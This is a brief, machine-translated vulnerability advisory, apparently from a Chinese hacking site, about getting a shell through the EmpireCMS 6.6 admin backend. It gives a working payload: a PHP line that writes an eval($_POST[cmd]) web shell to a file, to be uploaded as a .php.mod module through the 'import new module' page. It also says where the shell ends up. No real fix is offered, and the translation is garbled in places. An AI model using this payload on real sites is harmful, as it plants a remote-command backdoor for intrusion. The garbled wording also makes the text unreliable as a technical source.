Empire(EmpireCMS)cms 6.6 the background to get shell-vulnerability warning-the black bar safety net

2011-12-28T00:00:00
ID MYHACK58:62201132728
Type myhack58
Reporter 佚名
Modified 2011-12-28T00:00:00

Description

Previous 6. 5(http://www.badguest.cn/Article/201011/78510.html)someone hair of the method is that the background---system setup---the management data table---management system models---import new module,directly put the modified php shell was renamed the shell. php. mod uploaded, the new version use uploadm~num. php to increment the number found 6. 6 No, after uploading turns into similar uploadm1324885505nXmTdQamQq. php this!

Vulnerabilityproof: one way is actually very simple<? fputs(fopen("cao. php","w"),"<? eval(\$_POST[cmd]);?& gt;")?& gt; Save As 1. php. mod then or into the background---system setup---the management data table---management system models---import new module, the upload after the horse is lying in the A/e/admin/cao. php.

!

Solution: you know?

Author discovery